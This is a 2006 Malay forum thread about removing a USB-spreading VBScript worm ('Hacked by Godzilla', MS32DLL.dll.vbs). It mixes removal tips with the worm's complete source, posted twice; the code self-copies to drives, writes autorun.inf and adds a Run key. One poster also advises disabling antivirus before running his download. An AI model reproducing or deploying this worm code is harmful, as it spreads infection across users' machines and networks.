slaughters 1 Report post Posted December 5, 2006 wscript.. aku tak tau aa nak buat camner dah.. aku pakai AV Avast.. takleh nak kill or detect automatik mende nie.. ni pasal ravmon aa.. kita klik kat patition.. then takleh nak masuk.. right click baru bleh.. nak delete fail autorun.inf tu.. kene kill process wscript tu....apa yang patut aku buat aa ? Quote Share this post Link to post Share on other sites
scorps 1 Report post Posted December 5, 2006 wscript.. aku tak tau aa nak buat camner dah.. aku pakai AV Avast.. takleh nak kill or detect automatik mende nie.. ni pasal ravmon aa.. kita klik kat patition.. then takleh nak masuk.. right click baru bleh.. nak delete fail autorun.inf tu.. kene kill process wscript tu....apa yang patut aku buat aa ?dah try masuk windows guna safe mode, Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 5, 2006 dah try masuk windows guna safe mode,untuk ape masuk safe mode ? actually process tu boleh di "kill".. tapi tu aa.. ermm.. aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe.. Quote Share this post Link to post Share on other sites
blurruitm 0 Report post Posted December 5, 2006 aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe..selalunye vrus nie kau kane buang kt startup dl. pastu baru delete manual vrus 2.cuba cari kat windows>system32.xpn kat lam windows.hati2 skit jangn slap delete plak jgn delete fail system sdah Quote Share this post Link to post Share on other sites
hampeh 21 Report post Posted December 5, 2006 try pakai process explorer ngan process viewer ..download kat http://www.microsoft.com/technet/sysinternals/default.mspx Quote Share this post Link to post Share on other sites
scorps 1 Report post Posted December 5, 2006 untuk ape masuk safe mode ? actually process tu boleh di "kill".. tapi tu aa.. ermm.. aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe..ko nak kill sajer ker ko nak delete terus??klu ko kill saje,lain kali ko reboot komp,process tu akan kembali lagii..ke aku yg silap paham??? Quote Share this post Link to post Share on other sites
alternat0r 0 Report post Posted December 5, 2006 Acu cube try test Software antivirus yang aku buat nih... mana tau ada detect apa-apa lak kan... make sure turn off antivirus yang ada dulu lepas tu baru run program nih...Download at: Server 1 Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 6, 2006 ko nak kill sajer ker ko nak delete terus??klu ko kill saje,lain kali ko reboot komp,process tu akan kembali lagii..ke aku yg silap paham??? ermm.. aku cakap aku boleh kill process tu.. huhu.. camne boleh delete ke process tu ? Acu cube try test Software antivirus yang aku buat nih... mana tau ada detect apa-apa lak kan... make sure turn off antivirus yang ada dulu lepas tu baru run program nih...Download at: Server 1ngko buat sendiri antivirus nie ? perghh.. ok.. aku try dulu.. anyway. thanks.. Quote Share this post Link to post Share on other sites
001x0 0 Report post Posted December 6, 2006 wscript.exe 'didaftarkan' sebagai Microsoft ® Windows Script Hostlokasi sepatutnyaC:\WINDOWS\system32\wscript.exeKalau nak activekan wscript.exe dan adjust sikitdari Run -> taipkan wscript.exe -> Enable 'stop script after specified number of second'Kalau sekadar nak Enable/Disable wscript.exedownload -> click untuk enable disablehttp://www.symantec.com/avcenter/noscript.exe* kalau nak delete mungkin boleh dalam safemode, tapi kesannya saya tak tahumungkin IE activeX, java script, vbscript, other windows component tak function* Wscript.exe Csript.exesebahagian dari IE komponen kot* perlu cari 'ibu' dia dulu nie, wscript.exe tak salah, Run Spybot & paste Hijackthis Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 11, 2006 Logfile of HijackThis v1.99.1Scan saved at 8:41:05 AM, on 12/11/2006Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.5730.0011)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exeC:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exeC:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exeC:\Program Files\Mozilla Firefox\firefox.exeC:\WINDOWS\system32\wuauclt.exeC:\Documents and Settings\Administrator\Desktop\hijackthis\HijackThis.exeR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by GodzillaO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dllO4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimizedO4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUPO8 - Extra context menu item: &Clean Traces - C:\Program Files\DAP\Privacy Package\dapcleanerie.htmO8 - Extra context menu item: &Download with &DAP - C:\Program Files\DAP\dapextie.htmO8 - Extra context menu item: Download &all with DAP - C:\Program Files\DAP\dapextie2.htmO9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO11 - Options group: [iNTERNATIONAL] International*O17 - HKLM\System\CCS\Services\Tcpip\..\{2F158875-931F-4DF7-BAF1-732836AEB8C9}: NameServer = 10.20.16.2,10.20.16.3O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dllO23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exeO23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exeO23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exeO23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exeO23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exeermm.. ni hijackthis.. Quote Share this post Link to post Share on other sites
HTM a.k.a. whiztech 0 Report post Posted December 11, 2006 R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzillapc aku penah kene vbs nih..ni code dia.. aku masih simpan dalam avast! virus chest... 'My name is Slow but sure V0.04 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if next set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname ko try search file MS32DLL.dll.vbs pastikan ko tick advanced option, search dalam subfolder, system folder ngan hidden files/folders... selalunya script ni lepak kat setiap local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) ngan c:\windows\MS32DLL.dll.vbs kot..kalau salah tolong betulkan.. Quote Share this post Link to post Share on other sites
alternat0r 0 Report post Posted December 11, 2006 Kalau ada sample boleh lah tolong uploadkan kat http://www.data0.net nanti aku tolong buat detection and removal... Quote Share this post Link to post Share on other sites
ApoNie 0 Report post Posted December 11, 2006 Untuk keselamatan, baik xyah dedah code tu.. Quote Share this post Link to post Share on other sites
alternat0r 0 Report post Posted December 11, 2006 Aku dah update untuk Portable Antivirus bagi virus yang dinyatakan diatas... cuba scan dulu...Download here... Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 11, 2006 Aku dah update untuk Portable Antivirus bagi virus yang dinyatakan diatas... cuba scan dulu...Download here...bagus betul ngko nie.. ok.. aku try jap.. thanks ! Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 12, 2006 bagus betul ngko nie.. ok.. aku try jap.. thanks !portable antivirus yang ngko buat ni bagus.. dapat detect.. tapi still takleh nak ilangkan hacked by godzilla!! camne aa nak buat! aku rasa kene buat satu thread yang bincangkan mende nie aa.. satu network aku dah kene.. hampes betul... Quote Share this post Link to post Share on other sites
unexistance 3 Report post Posted December 12, 2006 da try pakai search? (*.vbs)pastu, tengok kat mana die bubuh..folder2 'ibu' yang biasa (ikut pengalaman):1. hidden folder dalam c:\windows2. c:\documents and settings\username\application data3. c:\documents and settings\username\local settings\application data4. c:\documents and settings\username\templatesp/s: tapi jangan main delete je, kang tak pasal2 tak boleh boot tapi vbs file biasanya tak kritikal ke sistem, so boleh kate selamat la, tapi hati2.. Quote Share this post Link to post Share on other sites
joetbg_x 0 Report post Posted December 12, 2006 tapi still takleh nak ilangkan hacked by godzilla!! ko tukar sendiri kat registryHKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla Quote Share this post Link to post Share on other sites
slaughters 1 Report post Posted December 12, 2006 ko tukar sendiri kat registryHKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzillahoho.. hacked by Godzilla dah settle.. ehehe.. thanks.. Quote Share this post Link to post Share on other sites
zareight 7 Report post Posted December 13, 2006 aku pon kene gak..camne nih?partition xleh double click..xphmla cara korg ajar tu..R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzillapc aku penah kene vbs nih..ni code dia.. aku masih simpan dalam avast! virus chest... 'My name is Slow but sure V0.04 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if next set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname ko try search file MS32DLL.dll.vbs pastikan ko tick advanced option, search dalam subfolder, system folder ngan hidden files/folders... selalunya script ni lepak kat setiap local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) ngan c:\windows\MS32DLL.dll.vbs kot..kalau salah tolong betulkan..camne nk bg partition pc bleh double click ar?com aku pon kene.. Quote Share this post Link to post Share on other sites
alternat0r 0 Report post Posted December 13, 2006 Download latest Portable Antivirus untuk detect virus jenis ni... Virus ni akan detect sebagai VBS/Slowbut.Aku dah buat detection untuk 2 jenis variant serta sampah sarap yang ditinggalkan oleh virus nih... Kalau virus ni tengah running, PAV akan automatic terminate process yang sedang berjalan... Try dulu...Don't worry, registry & perkataan 'H@cked by ...' pun akan automatic fixed... Quote Share this post Link to post Share on other sites
zareight 7 Report post Posted December 13, 2006 (edited) da bleh da..thanks alternator n sape2 yg bantu... Edited December 13, 2006 by zareight Quote Share this post Link to post Share on other sites
Impreza_2004 0 Report post Posted December 14, 2006 wscript.exewscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?wscript.exe (Vbswg.Aq Worm) - DetailsIf a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.wscript.exe is considered to be a security risk, not only because antivirus programs flag Vbswg.Aq Worm as a virus, but also because a number of users have complained about its performance.Vbswg.Aq Worm is likely a virus and as such, presents a serious vulnerability which should be fixed immediately! Delaying the removal of wscript.exe may cause serious harm to your system and will likely cause a number of problems, such as slow performance, loss of data or leaking private information to websites.You should visit our free spyware removal page to make sure your system does not have other programs like wscript.exe.WSCRIPT.EXE - DisclaimerEvery attempt has been made to provide you with the correct information for wscript.exe or VBSWG.AQ WORM. Many spyware/malware programs use filenames of usual, non-malware programs. If we have included information about wscript.exe that is inaccurate, we would greatly appreciate your help by updating the spy bot database and we'll promptly correct it.You should verify the accuracy of information we provided about wscript.exe. Vbswg.Aq Worm may have had a status change since this page was published. Quote Share this post Link to post Share on other sites
firefolk 0 Report post Posted December 14, 2006 try disable 1stSTART > RUN > MSCONFIG > STARTUP tab. Quote Share this post Link to post Share on other sites
alternat0r 0 Report post Posted December 15, 2006 wscript.exewscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?wscript.exe (Vbswg.Aq Worm) - DetailsIf a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.. . .Pendek kata, wscript.exe tu untuk run fail Visual Basic Script... fail ni bukanlah virus, memang Microsoft provide dalam setiap Windows tapi ia boleh menyebabkan security risk (Low)...Vbswg maksudnya Visual Basic Script Worm Generator. Quote Share this post Link to post Share on other sites